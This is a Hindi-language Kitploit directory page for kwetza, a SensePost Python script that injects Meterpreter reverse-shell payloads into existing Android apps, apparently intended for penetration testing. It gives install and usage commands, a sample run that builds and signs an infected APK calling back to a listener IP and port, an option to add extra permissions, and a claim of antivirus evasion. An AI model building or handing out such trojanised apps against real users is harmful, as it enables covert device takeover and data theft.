Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
kwetza — मौजूदा Android एप्लिकेशनों में Meterpreter payload इंजेक्ट करने के लिए Python स्क्रिप्ट। | Kitploit
उपकरण/GitHubGitHub/sensepost/kwetza
एंड्रॉइड सुरक्षापेलोड जनरेशनशोषणमोबाइल ऐप पेंटेस्टिंगपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubsensepost/kwetza

kwetza

मौजूदा Android एप्लिकेशनों में Meterpreter payload इंजेक्ट करने के लिए Python स्क्रिप्ट।

रिपॉजिटरी देखें
6442398 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

परिचय

Arsenal

द्वारा: Chris Le Roy (@brompwnie) [email protected]

Kwetza एक उपकरण है जो आपको मौजूदा Android एप्लिकेशन को Meterpreter पेलोड से संक्रमित करने की अनुमति देता है।

यह क्या करता है?

Kwetza मौजूदा Android एप्लिकेशन को कस्टम या डिफ़ॉल्ट पेलोड टेम्पलेट्स के साथ संक्रमित करता है ताकि एंटीवायरस से बचा जा सके। Kwetza आपको लक्ष्य एप्लिकेशन की डिफ़ॉल्ट अनुमतियों का उपयोग करके या अतिरिक्त अनुमतियाँ इंजेक्ट करके अतिरिक्त कार्यक्षमता प्राप्त करने की अनुमति देता है।

ब्लॉगपोस्ट कहाँ मिलेगी?

Kwetza द्वारा स्वचालित मैनुअल चरण यहाँ पाए जा सकते हैं: https://sensepost.com/blog/2016/kwetza-infecting-android-applications/

कोड प्राप्त करना

सबसे पहले कोड प्राप्त करें:

root@kitploit:~
git clone https://github.com/sensepost/kwetza.git

Kwetza Python में लिखा गया है और इसके लिए BeautifulSoup की आवश्यकता है जिसे Pip का उपयोग करके स्थापित किया जा सकता है:

root@kitploit:~
pip install beautifulsoup4

Kwetza के लिए Apktool को स्थापित और आपके PATH के माध्यम से सुलभ होना आवश्यक है। इसे यहाँ स्थापित निर्देशों का उपयोग करके सेट किया जा सकता है: https://ibotpeaches.github.io/Apktool/install

उपयोग

python kwetza.py nameOfTheApkToInfect.apk https/tcp LHOST LPORT yes/no customClass

  • nameOfTheApkToInfect.apk = वह APK का नाम जिसे आप संक्रमित करना चाहते हैं।
  • https/tcp = HTTPS या TCP कनेक्शन चुनें।
  • LHOST = आपके लिसनर का IP।
  • LPORT = आपके लिसनर का पोर्ट।
  • yes = ऐप में अतिरिक्त दुष्ट अनुमतियाँ इंजेक्ट करने के लिए "yes" शामिल करें, "no" ऐप की डिफ़ॉल्ट अनुमतियों का उपयोग करने के लिए।
  • customClass = यदि आप चाहते हैं कि Kwetza इस गतिविधि में इंजेक्ट करे, तो यहाँ एक कस्टम गतिविधि निर्दिष्ट करें।
root@kitploit:~
python kwetza.py hackme.apk https 10.42.0.118 4444 yes com.moo.another.activity
[+] MMMMMM KWETZA
[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING COMMS...
[*] ANALYZING ANDROID MANIFEST...
[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity
[*] INJECTION INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK
[*] EXECUTING APKTOOL BUILD COMMAND
[+] BUILD RESULT
############################################
I: Using APktool 2.2.0
I: Checking whether source shas changed...
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs ...(/lib)
I: Building apk file...
I: Copying unknown files/dir...
###########################################
[*] EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
###########################################
jar signed.

###########################################

[+] L00t located at hackme/dist/hackme.apk

जानकारी

Kwetza को Python 2 के साथ काम करने के लिए विकसित किया गया है।

Kwetza डिफ़ॉल्ट रूप से "payload" फ़ोल्डर में स्थित टेम्पलेट और कीस्टोर का उपयोग करके संक्रमित APK को इंजेक्ट और साइन करेगा।

यदि आप संक्रमित एप्लिकेशन को अपने स्वयं के प्रमाणपत्र से साइन करना चाहते हैं, तो एक नया कीस्टोर जनरेट करें और इसे "payload" फ़ोल्डर में रखें और मौजूदा कीस्टोर का नाम बदलें या kwetza.py में संदर्भ बदलें।

पेलोड टेम्पलेट्स के लिए भी ऐसा ही किया जा सकता है।

डिफ़ॉल्ट कीस्टोर का पासवर्ड, ठीक है, "password" है।

लाइसेंस

Kwetza Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License (http://creativecommons.org/licenses/by-nc-sa/4.0) के तहत लाइसेंस प्राप्त है।

इस लाइसेंस के दायरे से परे अनुमतियाँ http://sensepost.com/contact पर उपलब्ध हो सकती हैं।

टूल डाउनलोड करें